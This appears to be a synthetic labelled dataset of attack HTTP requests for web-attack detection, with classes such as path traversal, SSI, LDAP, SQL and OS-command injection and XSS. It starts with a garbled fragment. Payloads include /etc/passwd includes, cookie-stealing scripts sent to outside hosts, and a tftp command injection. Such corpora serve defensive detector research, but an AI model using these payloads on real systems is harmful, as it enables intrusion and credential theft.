DAuy1ATSI=0585588731&NX@EP8ggconnectM=t9reeptaeedtdii&H2cq1=eVt&xsDecacvaiehd=olaYdehei&le=oRvva'R~t%hoo:6gsrrcp&curaasI=updatephhlinkvarxrnchperlji\AeosA&comylseoatit1=ifc1hant2h&deiK=f&XrdaAfbre3m=gdBu6Reoqrip0etU&0otn2egHwsse=4139892&cdh=y@ib\ i|nsl+secemtp&aysAvsnep=r(

End - Id: 35894
Start - Id: 45627
class: PathTransversal
GET /hdacathHm2Ld/qqA8jtvyt/6122iuSQ/2-aVoTbeniH-F.jpeg?rjmiokt=laeihcjpeo6f3&iiseRahHIaziak=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat HTTP/1.1
Host: www.6ihen.com
Connection: keep-alive
Accept: audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: compress;q=0.2, deflate;q=0.1
Accept-Language: *;q=0.3
Cache-Control: max-age=6
Client-ip: 95.84.73.85
Cookie: ooheshdgie8lmin=gevb shtpassu1ur;9eureudsnpd=i9qf0R2Fd7Vd;Tetejupeift=hTMulFM;dqoxktHd=8636190;afdrsrep2=oenth;ndilnH=hHlb2a
Cookie2: $Version="56"
Date: Fri, 03 Nov 06 12:13:32 UTC
ETag: W/"sYyB35YeGsihhcrLD"
Expect: seoOtore
From: icafeu@elilysn5.com
If-Modified-Since: Fri, 24 Jul 09 18:18:18 UTC
If-Unmodified-Since: Sun, 16 Nov 08 23:06:32 CET
If-Match: "bAsTW383JDRa0PgbyVJ"
If-None-Match: "oguLrXfbQGcotPKGMw"
If-Range: Mon, 11 Sep 06 19:44:15 GMT
Max-Forwards: 18
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic bnloYVQ6aXNydGh0eXM=
Authorization: Basic YnNoZ2xZOmFuTzVhMWVt
Range: 41-9272,-212,7881-582
Referer: http://www.eeneth.net/pgnmsw/eaEr/sets/7ese.ace
TE: chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.3 (X11; U; Unix 4.5; s2-al; rv:4.8.4) Gecko/95844126
UA-CPU: Sparc
UA-Disp: 6050,986,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 822x7787
Via: 6d3/2.2 10.77.140.109
Transfer-Encoding: compress
Upgrade: wdths/1.4, ocajr/8.7, hnt/8.6
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 749320741
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45627
Start - Id: 40559
class: SSI
GET /lewsha5BEegtrct/nFtpGh.jpeg?o1eaenuRbte=ethsKE&hYnMislnayyi0Ey=83429&ayyrkai=9&tr46rfoinsnm=%3C%21--%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&Qt8ey=v4TLIV&tnUny4=47&nvutiad8vn=069&uiajti=rL%3Dlrtconnect6deletemklirF9olocationre&wj=sdpautoexec&VWy8=oiNndxmlhRpxn%3D%5Bew&glSfgr=46140&eikih=e HTTP/1.1
Host: 201.67.157.139:80
Connection: Tg90uet
Accept: */*;q=0.3
Accept-Charset: x-mac-greek;q=0.8, iso-2022-kr, koi8;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 99.30.78.189
Cookie: l7IncorA=oexgpnq ictt7+zyks2;do=mtdeac;wMYvcopyb7FaY_=mojidya7
Cookie2: $Version="29"
Date: Mon, 26 Nov 07 01:29:12 GMT
ETag: "2K1bpP-8kIebbsTC"
Expect: 100-continue
From: tyoPDg0e@eA2xhe.com
If-Modified-Since: Tue, 25 Mar 08 16:27:17 GMT
If-Unmodified-Since: Sun, 25 Apr 10 10:44:07 UTC
If-Match: *
If-None-Match: "YpqIZcDHee6yEJVAw56L"
If-Range: Sat, 30 May 09 10:53:02 CET
Max-Forwards: 09
Pragma: rannp='ruaaemwe'
Proxy-Authorization: esno rs47tyd=n7dsbg
Authorization: Digest realm
Range: 488078-9765
Referer: /dmilw9eh/aciyoNnn/rrhsziu/fra8mpv5/asa1.shtml
TE: chunked,trailers,trailers
Trailer: Pragma
User-Agent: oaaeth (cEx1OUH; lfK2aRzI)
UA-Disp: 9897,2290,16
UA-OS: Windows 98
UA-Pixels: 0455x286
Via: 2at/9.2 www.nnsaj.jpeg:8028, ozx/5.1 185.246.222.167:6823
Transfer-Encoding: compress
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 885 www.ctsaoon.js "2nm3fnnnfehteoPv" "Sun, 30 Sep 07 18:31:53 UTC"
X-Forwarded-For: 93.136.204.39
~~~~~: ~~~~~~~~~~~

null

End - Id: 40559
Start - Id: 37100
class: LdapInjection
GET /TlikeTRfiEVWC/ElsPxQsWiFpBRhtpassH/uq/1JtxmlAteBC/RAFTscript6pGhR/iv2Sn3X6IuHT/mY.mspx?randz@XUmE=vbscriptmsh%26&0houenrslt3t5=+ro6&Ai5winnthtpasskkaRQm=ct%29%28+%7C++%28ad7o%3D*%29&Iroc1v=9&lsfieieoqsbi=d40ehKnX1&idthM5txtahc=tl&l5ihawiTeoo2eg=ybs3nhk2&es=an%2BY&w5=h%403h5jqGU&seAfb6=%3Ft HTTP/1.0
Host: www.Iesnp.net
Connection: poig
Accept: image/jpeg;q=0.8, text/html;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, identity;q=0.4, compress;q=0.1
Accept-Language: *;q=0.1
Cache-Control: max-stale=82
Client-ip: 236.39.89.101
Cookie: dojtrcu=/$a+~phtpasslog;t+i4zadmin/catqn;bnsa7maahelea=smeso;nushRiUejnsor1h=ern;wdevk0ecneidn=rRA_Jq;xvxo3hehsoNoI0n=0944143630;h1=o0YbDTdejsx
Cookie2: $Version="020"
Date: Mon, 13 Jul 09 11:58:52 CET
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: idorit=hhox;9ha3ae=2Vh6e
From: 5cih8hH@th6En.it
If-Modified-Since: Thu, 19 Jul 07 02:03:03 GMT
If-Unmodified-Since: Tue, 27 May 08 05:02:12 UTC
If-Match: *
If-None-Match: "gGn5vLc_lyahSWputd"
If-Range: "W7XTBtMaRDfnc-i8w87"
Max-Forwards: 64
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic ZGk5b2g6bmZpcmU3
Authorization: maessy sOhmS=idhnenqn
Range: 8-29969,-67,432-912142
Referer: http://ItF0stso.uk/bnsrg/f1Nojoo/eesodr/nmcm.mdb
TE: deflate
Trailer: Via
User-Agent: mBtNMHLrK http://www.eet2a5.it
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 617x3755
Via: 2.2 202.62.238.81, 7.1 67.193.79.182:4
Transfer-Encoding: 6mna
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 330 www.aiew2aRa.jpg "huTweibwmAEeQpte" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37100
Start - Id: 41204
class: SqlInjection
GET /dQtyhoogokeo6/cSrNoEsu.jpeg?yaorl=535386&zFAQPAbc=e&ngno=k%25I&ega11assrti=tr+frlre&ZEHlhavingsock_streambNi=ineee1i5%7Eseh%28rOt4 HTTP/1.1
Host: www.dcfttaebi.org:4468
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: ;   EXEC(   'INS'+'ERT  INTO     users    values(767,'eEeD3','eroaiein'))
Cache-Control: min-fresh=750
Client-ip: 116.254.118.56
Cookie: sRsieie=ei;cr=36Tlc;div-4null=480;lesnluAsld=T4hfh;tttStAem1=dffBwj0vY-;asoslcts0ow=00405864
Cookie2: $Version="6"
Date: Tue, 24 Apr 07 05:42:55 UTC
ETag: W/"YXBetey.8iNlpkQ"
Expect: ttfr=i4irsb;s65p1tr=etl9i
From: tercor@topretr.biz
If-Modified-Since: Sun, 30 Apr 06 01:53:50 UTC
If-Unmodified-Since: Sun, 07 Sep 08 23:57:51 GMT
If-Match: "VLk6Hk1THR8xrseFm9"
If-None-Match: "7dEOX6ERtmr7NHcFUO"
If-Range: "sQ86Wd68_f7SuJkc9gK"
Max-Forwards: 80
MIME-Version: 0.2
Pragma: sH=iteOedsg
Proxy-Authorization: QnNEm sle7s=ykdes
Authorization: Basic b1N0Z1M5ZXI6M3lob3M=
Range: 53-4,37-,6-8482
Referer: /4pie/shtTiz/hoiluhoe.html
TE: trailers
Trailer: Expect
User-Agent: sbeeoe7/7.4.6
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9140x4441
Via: 9.1 www.tr7rEE.tiff, FTP/7.9 193.19.185.201:7, 2.2 94.133.191.135
Transfer-Encoding: identity
Upgrade: Ailo/4.2, 33e/8.5, daA/4.6, rId/6.3, euOe/7.5
Warning: 023 www.aubonl.html "brwUpele7rpookpse" "Tue, 09 Mar 10 24:01:48 CET"
X-Forwarded-For: 193.219.83.250
X-Serial-Number: 9505530425947859
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41204
Start - Id: 46871
class: XSS
PUT /uTlSc/tasc/of/a7-u6qNlE.sh? HTTP/1.1
Content-Length: 302
Content-Language: 4tidwth,et
Content-Encoding: gzip
Content-Location: /ioohpohr.zip
Content-MD5: cnNmc0ViNXQ1MWFLaXJTdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 24 Oct 07 04:40:11 CET
Last-Modified: Fri, 22 Jun 07 21:28:56 UTC
Host: www.oemsi79.biz
Connection: close
Accept: audio/*;q=0.2, video/*;q=0.7, image/*;q=0.4
Accept-Charset: big5
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=237
Client-ip: 74.208.49.31
Cookie: Nsee3aht5s5iDav=aael;IolshomeH=@j@an
Cookie2: $Version="36"
Date: Fri, 23 Oct 09 04:20:55 GMT
ETag: "ynNtDqxUiypefBzDU"
Expect: o8peIAo=Tntr;2acsg=ihsto
From: xorersew@0i1thu.fr
If-Modified-Since: Wed, 28 Oct 09 17:39:25 CET
If-Unmodified-Since: Fri, 11 Mar 05 16:39:07 GMT
If-Match: "DXsJZHPtR_wDooUiIp"
If-None-Match: "geXEbMmeVd.fy4T3WJ"
If-Range: *
Max-Forwards: 128
MIME-Version: 8.9
Pragma: 6t='crtad'
Proxy-Authorization: Basic amFib2lrQWY6bWVxOHNyZA==
Authorization: Digest uri=/ioptabs/frdsoAN/sEhe7/Ittfram8.mpg
Range: 6262-,10870-70169
Referer: /nvZ3url/tiiaqhi/dspgsnr.cgi
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: ad3e6/4.9
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: FTP/3.0 159.8.188.28, 5.7 185.242.215.249
Transfer-Encoding: compress
Upgrade: Btglc/3.9, rreo/8.4
Warning: 910 www.aqeeeiu.htm "tjdShea8TwiOuAu" "Mon, 12 May 08 02:53:43 CET"
X-Forwarded-For: 213.211.107.254
X-Serial-Number: 93268691782079750245
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

_mpCtf=d?igoyl\tut9&e9eoleitjmgEt2=2789&We0lio3bswo=h&Esgorcdhfpeto9=<bgsound   src   =   "    javascript:   [document.location.replace ('http://www.ilalne.com/cgi-bin/reortiol.cgi'+document.cookie);] "  >&udsw=hatnomswececho3u+T&iqo=b-VM9gzQ&buzreoltJ7o=aea

End - Id: 46871
Start - Id: 48250
class: XSS
POST /us/1tmpDnTFn_kbxN/runShu/0unionkincludeDlR5Bexec/Gpt2lgprZG9sopen/s@nQVT/rNBbvG9eD5yYcate/oahltritxdpmi/eJOPsQxme/ln9fafdniniIo7nmmMrt.jpg? HTTP/1.1
Content-Length: 242
Content-Language: utsu4m,inneAll,xhlenkh
Content-Encoding: compress
Content-Location: /ieil/ktnta/ebnn/aitIsEV/trte5t.jpg
Content-MD5: dHVJc0F0Z3V0cWxPbmE1ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Jul 07 09:12:44 CET
Last-Modified: Tue, 20 Sep 05 07:30:04 UTC
Host: 113.120.189.242
Connection: plmm4
Accept: image/gif, video/*
Accept-Charset: cp-936
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: min-fresh=3115
Client-ip: 182.187.98.155
Cookie: xFQconnectrcp_53m=<xml  id=    " X"    ><a    ><b   >&lt;script  >[window.open('http://182.143.186.197/el.msf'+document.cookie);]&lt;/script   >;</b></a    ></xml>;aiiomioianraEp7=&sY4;ths=lsata
Cookie2: $Version="445"
Date: Sun, 06 Sep 09 22:15:05 CET
ETag: "cr5Cpd59of.@swB97"
Expect: ancge
From: leoau@ioycU5in.ch
If-Modified-Since: Fri, 17 Nov 06 10:54:50 GMT
If-Unmodified-Since: Tue, 16 Nov 04 18:01:06 GMT
If-Match: "QBR3KPfUl-lPun-CAUI-"
If-None-Match: *
If-Range: Mon, 11 Jul 05 24:17:23 CET
Max-Forwards: 3401
MIME-Version: 4.8
Pragma: 7=cv
Proxy-Authorization: NTLM ZUllc2VkZWhiY2l3MG40c09IdGhhaGVzNnlIYW1pNm85cmRhaWtu
Authorization: pthi nnai4l=Honcoon
Range: 1099-42048,18-50962
Referer: /Os6Nwdeh/yssoabT/cwbie.mpg
TE: gzip,trailers,deflate;q=0.0
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.7 (Machintosh; U; PPC Mac OS X 4.2; fa-n3; rv:5.0.3) Gecko/45885328
UA-CPU: 68000
UA-Disp: 344,654,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9341x017
Via: 7.6 113.13.0.48, 0.5 www.oea1.html, 8.0 255.38.164.113
Transfer-Encoding: gzip
Upgrade: anpU/1.3, qtqiol/8.7, eiaeO/6.1
Warning: 342 173.97.45.171 "uivI8e2ePc" "Sat, 10 Mar 07 19:18:29 GMT"
X-Forwarded-For: 233.95.8.172
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

jv7=98925&ow4Dvd3nageeiui=iiIzfepai3iyhhlbd&BPMVadmin=divodaj&olhNd24h=2899628397&r7eo=- &Noon4s=Topty&aohtqnnsgEt=4988863699&d2heurs7oLnnt=6dc5&otyabpSvsmC=010686&ratemiecscotio=Sepr6c&isaeh=9beN hee 86Tytb &yENwtm3Ec=SifjsTt&Iihujoiw=rnb2hA

End - Id: 48250
Start - Id: 37532
class: LdapInjection
POST /sd2xaU1OJO.5K/ProosuaeoKvodohEre9r/eR3g@nL2cH88p66zq/qonselt8llun9ubgxyu/6emueoruBtqeso/oFR.shtml? HTTP/1.1
Content-Length: 83
Content-Language: stTa,yetaut,n4wNjc
Content-Encoding: gzip
Content-Location: http://ec0jtmo.ch/newixNoo/oaie/cmthm.js
Content-MD5: bWVhb2dvcmFBaHR0NnJ5bw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Nov 06 16:11:07 UTC
Last-Modified: Sat, 16 Feb 08 01:51:48 UTC
Host: www.xtbBibce.ch
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity
Accept-Language: 2qm-trftio9o, sie9-wkent;q=0.4, s-ib4mie;q=0.7, vaaete1i-ohRt;q=0.9, e93o-TXRen
Cache-Control: max-stale
Client-ip: 133.128.23.213
Cookie: r73SokHQ8r=5;tehiy8hEtqe= yg ;a9s8tr7Lnnceq=6
Cookie2: $Version="192"
Date: Tue, 22 Apr 08 19:50:33 CET
ETag: "cvwP9_XN-CuZEemWyx2y"
Expect: 100-continue
From: nIt1h@rvrs.org
If-Modified-Since: Thu, 23 Sep 04 03:54:05 UTC
If-Unmodified-Since: Tue, 08 Jun 04 23:19:38 GMT
If-Match: "mx6513s4eb7GsNrm"
If-None-Match: "o@X5y-IYqeEBjommG"
If-Range: Tue, 06 Jan 04 11:55:55 CET
Max-Forwards: 06
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: rertml hneO5=eocht
Authorization: exhnt3 5a97nph=n4fkait1
Range: 0516-7855,069180-,334-
Referer: http://www.reaeahr.it/teH3uc.tar.gz
TE: chunked
Trailer: TE
User-Agent: m._UM3tl5d http://www.95imhn2m.gov
UA-CPU: MIPS
UA-Color: color32
UA-Pixels: 523x786
Via: 1.2 119.3.52.102
Transfer-Encoding: vltTj; slHnobo=ta87
Upgrade: njD/1.9
Warning: 162 www.befnhlc.css "osea53nrTepho" 
X-Serial-Number: 749091
----: ----------------
~~~~~: ~~~~~~~~~~

VXwL1=)   ( |    (  cn=*o 'brien* )(mail    =*o 'brien*    ) 

End - Id: 37532
Start - Id: 44789
class: PathTransversal
GET /kEwent87msethsvitdth/selectS-Jbody0/aunfo6nrangel/2cVD5nA_L.u1sLFQP/0hr.asmx?HATevieT=eqpCGogr1V&dulImrMtyr=tcy&av4Bf=tdo+xixe&kgroup by4o26.woa6=aia&irs=907624&lrlqwarsManne=oetwncK&m8nisnilwa=989048&ohnvaehtoMgsM=+aiframe7at&ue1s=171353319&tsdyauy9mote9sb=..%2F..%2F..%2Fusr%2Fdsqqdsqsd.xml HTTP/1.1
Host: 12.103.10.22
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 108.193.198.116
Cookie: neet=9157226;pWuvrbnuh=df|
Cookie2: $Version="24"
Date: Fri, 15 Jul 05 03:21:33 GMT
ETag: "iFE2lKQFDoEmCoaqzw"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Mon, 27 Mar 06 13:37:41 GMT
If-Unmodified-Since: Sat, 20 Feb 10 11:26:53 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Jun 07 16:07:58 CET
Max-Forwards: 3
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM c0lyb3NlYTRVYWluMmhpY3d0YnRCZXRUd3l0dGNlb2RvdXRyZGx2cnlh
Authorization: Basic bnRydEJlQTpxbWRR
Range: -935
Referer: http://www.iroeffb.be/cahaWc/runnhze/mTg0nfss/4wofyuio/xAegK5m.txt
TE: deflate;q=0.1,trailers,deflate;q=0.7
Trailer: Expect
User-Agent: 3iTsoiNoe/9.0.5
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 822x152
Via: 3.1 139.148.75.56, 4.1 www.vd5p.gif, 9.0 240.148.45.168
Transfer-Encoding: gzip
Upgrade: esi/8.5, tw4ftd/0.3, 7ja/8.6, tnxgiT/3.3
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 87.170.85.167
X-Serial-Number: 2157159271334
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44789
Start - Id: 37794
class: LdapInjection
GET /34KHEnznnc3HoCd1I4/mi/vmnuip.mdb?ia4x8=606680984&ie6snreoggm=w1N.4o&yKnie5lhAotabt=buKrettdeil&vv=ai-siftec%26Ihdqj&toh1=kinput&wrtiee=glWB6s&oAicd=eoantirnnleavr3t&mieravstt=m.DP2jOCZ&oi=06587&Fdsf5ruewroc=uAseobjecttSte&wenmpnencc=l&wAmfl=%29++++%28+%7C++++%28displayName%3Dhad*%29++%28name+%3D++had*+%29%28mail%3Dhad*++++%29&ghfn=+spskwhere3orowatect HTTP/1.1
Host: www.TtxsrgoqsE.cz
Connection: ateey
Accept: */*;q=0.0
Accept-Charset: x-mac-greek;q=0.4
Accept-Encoding: *
Accept-Language: eingortg-1t3o, scchtd7n-gta1Epin;q=0.0, a-yr, ii-xvjtcm4;q=0.9
Cache-Control: sa='maq4'
Client-ip: 88.4.33.9
Cookie: aeoea9s=noaM;hr=yGU;FOOQfrom.Z_8=hetihahn
Cookie2: $Version="89"
Date: Tue, 10 Nov 09 24:35:50 CET
ETag: W/"v4Jd_fMeChEj0Ulgn"
Expect: h2tit=i1adelef
From: uh7w@ednaarot.de
If-Modified-Since: Fri, 11 Feb 05 07:51:37 UTC
If-Unmodified-Since: Thu, 01 Jan 09 19:51:17 UTC
If-Match: "f3x@0zpY1dEO4wSNMEhf"
If-None-Match: "XmK4sVe2QJl0z0vZ"
If-Range: Tue, 29 Dec 09 11:28:05 CET
Max-Forwards: 9558
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: NTLM bXNiYWhpN29ubThuZXJheThvdXNzU0FhZXNhRFdncmx5MG5hZHpubzZyZTA=
Authorization: Digest realm
Range: 849-,1727-46918,-68
Referer: http://aerHsiH.it/tmdbR/fa1guefe/e5re/nerrr.php4
TE: trailers
Trailer: If-Range
User-Agent: duraai9 (cqovrnmQ2; eyu1nnq; e1QmShnV; hbCrELxTT5)
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 800x7457
Via: 9.5 12.189.233.108:313
Transfer-Encoding: gzip
Upgrade: et7h/0.6
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 51540025219516295727
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37794
Start - Id: 39862
class: SSI
PUT /nmf/seat5eths7o/vrF/5teaie/nZ9zfRJ3D/somwt/hsjsrgcws/4T2Jr0/rwu2GoYmZ0dV/elwcsaoPGEJFvgRhgZ/egRAsX5/yYKylw6YFwinnt.html? HTTP/1.1
Content-Length: 207
Content-Language: saoitop
Content-Encoding: compress
Content-Location: http://www.Luans.it/ztihdm/lghecs/Sxter.bin
Content-MD5: YXRpdGp4dGd3bDRzMHJvdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 21 Oct 06 22:08:24 CET
Host: www.3fowEEa.net
Connection: dlioeri
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: h8m-ro;q=0.5, hslplot-st;q=0.0, sYed-oimrl;q=0.8
Cache-Control: max-age=7
Cookie: y%ui_tO_W1=d+%273lnw;tnewtsLeoii=%3C%21--+++%23include++++virtual%3D%22%2Fetc%2Fpasswd%22--%3E
Date: Fri, 23 Apr 04 23:58:47 UTC
Expect: 100-continue
If-Modified-Since: Sat, 22 Apr 06 19:25:06 GMT
If-Match: "AIep@hPdAZbrlNxOq3UQ"
If-Range: *
Max-Forwards: 4305
Authorization: Basic YWNscHlkeXU6UnJvb3Jucw==
Referer: http://www.fwi4biud.com/feErr/Reoz/onnmrfk/boknDhN/netaef4.mp3
User-Agent: Mozilla/8.2 (X11; U; Solaris 5.2; ne-fb; rv:6.0.7) Gecko/62380215
UA-Color: color8

2lEkttdcRiLen=ojsT&uTaeasod=5883292&579CB-RoL=dza&EauneOtnya=3151&ehlsste=4&ttkrearqg=|-&gnd5tde=ainsattt0rTn uati\1&afnTaeosqnmEoti=@oFt&iner2e5TsT5hNg=61565&Hrd=tzo&itatuepyH4=eq5a5heechoomtwaxtermhf

End - Id: 39862
Start - Id: 37097
class: LdapInjection
GET /Aurnt2cth7ahz/lZbcSsNTHsjZwVzLC/tf3epxhr/nNexecZw/bcds/ltht9yrosssD/vtt7TX9P1r020.swf?yf=%29+++%28%7C++%28+cn%3D*o++%27brien*+%29%28mail++++%3D*o+++%27brien*+++%29&paxiblhe=574407&TsoPieineioe=1838165&ilosZstn6EOeNii=b37%25s&XO71xp_9acceptG2=iFPY&SzhintneibsNewt=4Qcat HTTP/1.0
Host: 146.15.118.139
Connection: cnldzhHu
Accept: audio/basic;q=0.3
Accept-Charset: *
Accept-Encoding: compress, gzip;q=0.7, gzip;q=0.5, identity, identity
Accept-Language: *;q=0.9
Cache-Control: max-stale=82
Client-ip: 159.59.152.71
Cookie: ano=s1io;teeewt1Dh7tee=6;lnC5=9
Cookie2: $Version="020"
Date: Sat, 12 May 07 11:44:25 UTC
ETag: W/"ex2f5I_0004_3pr7.R--"
Expect: idorit=hhox;9ha3ae=2Vh6e
From: 5cih8hH@th6En.it
If-Modified-Since: Thu, 19 Jul 07 02:03:03 GMT
If-Unmodified-Since: Tue, 27 May 08 05:02:12 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6
MIME-Version: 4.7
Pragma: rdrhi=ne4ril
Proxy-Authorization: NTLM dWhtaWVpa29hZHRzbzh3bGlrc3pIdU41eGxpdmFoSDRhYWVsbnM0dQ==
Authorization: Digest uri=http://www.ieofy.fr/etne9/oL1A/s0oe.cfm
Range: 8-29969,-67,432-912142
Referer: http://npyu0an.biz/E0lc/ulTqbmr/fssh2lU/tenoad6t.swf
TE: trailers
Trailer: Max-Forwards
User-Agent: 7wnzynm
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 617x3755
Via: HTTP/1.1 www.vztiai2.png:67, 5.9 www.rrTtuweh.shtml:0
Transfer-Encoding: ytHgo; ethv=mSnao
Upgrade: stee/0.5, Rob/4.7, geii2/2.7
Warning: 620 www.gRricn.htm "alTyesjrtent3" 
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 73490105106
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37097
Start - Id: 39004
class: LdapInjection
POST /iu0r6Tq52uSU7At-/tpN5lj1R437_oz/uP2PxU-TVOx.css? HTTP/1.1
Content-Length: 235
Content-Language: rd,rvhi0ane,po3mghs
Content-Encoding: identity
Content-Location: http://www.w8Kfler.biz/drnehgn/e6et6.zip
Content-MD5: ZmJSbnN0dmxhZ3RhZW9rOA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jul 05 21:07:29 UTC
Last-Modified: Fri, 15 Jan 10 22:16:10 UTC
Host: 228.0.9.173
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: deflate;q=0.2, identity;q=0.5, deflate;q=0.5, gzip;q=0.9, identity;q=0.8
Accept-Language: ")(targetfilter=(o=NetscapeRoot))
Cache-Control: no-transform
Client-ip: 205.198.95.102
Cookie: Tlohmu=nC.Zxij2rq.a;7as=wao0
Cookie2: $Version="008"
Date: Sun, 08 Apr 07 15:49:28 CET
ETag: W/"VPJnp3@veVviL60"
Expect: 100-continue
From: lThhoeh@8eere.gov
If-Unmodified-Since: Sat, 19 Sep 09 17:15:23 CET
If-Match: "xzYVfw_5@It4i0lNBG8"
If-None-Match: "uJyUcPJ3_jfvPW6okYz"
If-Range: "SxkK7tfb1AlMzkwZ6"
Max-Forwards: 8709
Authorization: Digest nonce
Referer: http://www.dtRaiast.org/ynpnhd/neXnOrd/yrHd/Mt66zNr5/DsjW.jpg
TE: chunked,trailers
User-Agent: b..qlmEC http://www.nhtsse.be
UA-CPU: x86
UA-Color: color16
UA-Pixels: 1899x922
Via: 8.1 172.112.26.215, 4.7 53.139.234.226, T7nnCn/7.5 229.54.231.42
Transfer-Encoding: compress
Warning: 333 www.zaso.html "eNnatxeetarsMa" 

iiio2joox=76&QzbodyTX=13&lee8C=tIl&jY@qwindow.openY0dqA6=0025759710&masfri=4885635052&poINDL1_=n|g6<andissPbo&atoorheihohel=97439237&ttNl2f=vYLCXP&saaOaiHu=5&od=76&na=f41lLq5j7qh6&rlasn3rrwc=3h &0cseeuaNao=guierk&6et0eDisu=hMrrlint

End - Id: 39004
Start - Id: 42982
class: OsCommanding
GET /position4MJZk/3oO3UhIpUgXwy/sdQhDmAwa1tO/sQn7Q/eRHYK@DRh2AxHSM/e8qrn/oAcedyemtd/r6t9NvzihitL5xt2eEm/havingWV./RGueeuXXcUolocation/t_IsW8Ra-zTYKa5z8BSn.tiff?8teeerVosn=deletehaving5+zh%40window.open+1i%25uegtit+e&jGKq.=n.OQjV&Umrht3Qhob=%3Bw&td=74323&lrdKuS=849488 HTTP/1.1
Host: 10.252.173.19
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-8-i, hz-gb-2312;q=0.8, koi8-r
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=128
Cookie: aos45kh=';uftp     -g  /home/anllieil/naesleneas     103.12.31.169   /istrne   ;
Cookie2: $Version="4"
Date: Sat, 16 Jul 05 02:02:18 UTC
ETag: W/"hihhRMqJ3pb0C8609wd3"
Expect: jrornf
From: 7MeMfe@gyahIt.cz
If-Modified-Since: Sat, 06 May 06 08:48:41 GMT
If-Match: *
If-None-Match: "AKn7c0AA_Ww5XNhEvY"
If-Range: Mon, 05 Jun 06 11:20:23 CET
Max-Forwards: 97
Pragma: no-cache
Proxy-Authorization: NTLM aXRhc3FuOHdzbm9leHZzb25lQUxzdGFhcUR1c3preW9vTklhTHJzc29oaQ==
Authorization: toag o9aet6=eiob6rt3
Referer: http://www.mate4a.com/linmutt/zw3t3.mspx
User-Agent: Mozilla/2.1 (X11; U; Solaris 7.2; iv-tx; rv:1.8.1) Gecko/04350563
Via: 5.0 www.1Gta2c.gif, 7.4 114.186.42.0
Transfer-Encoding: identity
Warning: 304 www.rahw3it.shtml "hmudaRiec" 
----: -------------

null

End - Id: 42982
Start - Id: 37506
class: LdapInjection
